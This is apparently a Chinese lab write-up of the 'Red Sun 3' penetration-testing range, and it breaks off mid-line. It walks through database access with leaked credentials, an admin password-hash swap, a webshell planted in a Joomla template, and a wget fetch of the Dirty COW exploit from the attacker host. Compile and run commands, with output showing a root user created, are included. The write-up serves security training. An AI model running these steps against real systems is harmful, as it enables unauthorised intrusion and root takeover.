红日3
环境准备
1、所有虚拟机已经自动挂起。且内网网段为192.168.93.0\24,外网网段为dhcp,不需要更改
2、修改VMnet2的ip为192.168.93.0网段,没有就创建。
因为校园网问题,桥接模式无法上网,为了方便,外网网卡改为net模式,并配置192.168.1.0网段,如下所示:
修改kail的ip以及dns
初始信息收集
扫出来了一些端口
直接访问80端口,貌似找不到有什么可利用的点。尝试目录爆破。目录爆破可以用kail自带的dirsearch、也可以尝试用awvs做一个全面的大保健。
这里利用AWVS:,其中包含目录、文件泄露
访问
拿下第一台机器
首先对
http://192.168.1.128/index.php/author-login
http://192.168.1.128/administrator/
进行暴力破解,没有成功。
但根据泄露的数据库信息,尝试连接数据库
用centos7的mysql连接失败了~~但利用Navicat Premium16成功了~
寻找用户名密码;一般都会有users字样。。发现是加盐了的md5。拉到md5网站破解,失败。但还是通过万能的互联网找到破解的方式,把密码修改为
$2y$10$EJ64ugc3YEnGH2jaM06XCO68igbTx4LpkcfVPnzoJHRy8Wm8h0Hti
明文为123456;记得保存原密码,养成习惯。当然,实战过程中,最好利用增加的用户登录。
成功进入了后台。
找到模板
创建一个新的文件:写入木马
访问/administrator/shell.php / /失败
但查看目录扫描的结果,可以猜测可能在templates/beez3/目录下
访问ip/templates/beez3/shell.php验证
通过蚁剑也成功连接
上传msf制作的shell.exe,但打开终端,发现权限太低了,根本没办法运行程序。
可能是受disable_functions的影响,利用蚁剑的disable_functions插件尝试绕过(失败了)
没办法再次求助于博客
在/tmp/mysql/ 目录下有个test.txt文件 #据说tmp文件通常有重要文件泄露
并且在前面这台机器是开启了22端口(ssh服务)
尝试进行连接,成功进行连接
发现与webshell不通用文件,所以无法找到webshell传进行的木马。本来想用xftp进行传进去,但考虑到这是个普通用户并没有权限下载ftp,于是先尝试能不能进行提权。uname -a 查看内核版本。
低于以下版本表示存在脏牛漏洞(CVE-2016-5195)
Centos7 /RHEL7 3.10.0-327.36.3.el7 Cetnos6/RHEL6 2.6.32-642.6.2.el6 Ubuntu 16.10 4.8.0-26.28 Ubuntu 16.04 4.4.0-45.66 Ubuntu 14.04 3.13.0-100.147 Debian 8 3.16.36-1+deb8u2 Debian 7 3.2.82-1
于是把脏牛工具包弄到kail上,kail开启服务,然后靶机进行下载。但很神奇,下载的竟然是一个网页。只能通过压缩的形式进行下载了,但需要unzip对zip格式进行解压,万幸,靶机拥有unzip。
kail : python3 -m http.server 8000 靶机:wget http://192.168.1.123:800/dirtycow.github.io-master.zip 靶机:unzip dirtycow.github.io-master.zip -d zangniu
失败样例:
可以看到他是一个目录,但打开只有一个网页
靶机情况:
查看是否拥有gcc,没有也可以通过先编译再上传到靶机
经过无数次的踩坑:
终于找到一个成功的
GitHub - firefart/dirtycow: Dirty Cow exploit - CVE-2016-5195
同样,靶机通过kail下载出来,上面有写;
# gcc -pthread dirty.c -o dirty -lcrypt #编译 #./dirty root #因为已经存在/tmp/passwd.bak 会失败 #rm -f /tmp/passwd.bak #./dirty root #root 为密码, ./dirty 密码
##提示信息,,他创建了一个新用户firefart,密码为root,这个用户拥有root权限 /etc/passwd successfully backed up to /tmp/passwd.bak Please enter the new password: root Complete line: firefart:fiw.I6FqpfXW.:0:0:pwned:/root:/bin/bash mmap: 7fcfe9a6b000 madvise 0 ptrace 0 Done! Check /etc/passwd to see if the new user was created. You can log in with the username 'firefart' and the password 'root'. DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
证明1: [firefart@localhost dirtycow-master]# cat /etc/passwd firefart:fiw.I6FqpfXW.:0:0:pwned:/root:/bin/bash /nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt
证明2: [firefart@localhost wwwuser]# echo 123 >1.txt [firefart@loca